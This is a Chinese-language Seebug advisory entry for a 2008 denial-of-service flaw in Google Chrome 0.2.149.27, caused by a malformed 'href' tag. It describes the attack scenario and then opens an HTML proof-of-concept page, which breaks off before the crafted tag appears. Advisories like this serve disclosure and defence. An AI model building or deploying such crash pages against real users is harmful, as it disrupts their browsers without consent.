Google Chrome畸形'href'标签拒绝服务漏洞

2008-09-11T00:00:00
ID SSV:4003
Type seebug
Reporter Root
Modified 2008-09-11T00:00:00

Description

BUGTRAQ ID: 31034 CNCAN ID:CNCAN-2008090602

Google Chrome是一款谷歌公司新开发的WEB浏览器。 Google Chrome处理特殊构建的'href'标签存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 攻击者需要诱使用户访问包含恶意href'标签链接的WEB页来触发此漏洞。

Google Chrome 0.2.149 27 目前没有解决方案提供: <a href=http://www.google.com/chrome target=_blank>http://www.google.com/chrome</a>

                                        
                                            
                                                &lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.1//EN&quot;
&quot;http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd&quot;&gt;
&lt;html&gt;
&lt;head&gt;
 &lt;title&gt;Google Chrome Browser 0.2.149.27 Remote DoS&lt;/title&gt;
&lt;/head&gt;
&lt;body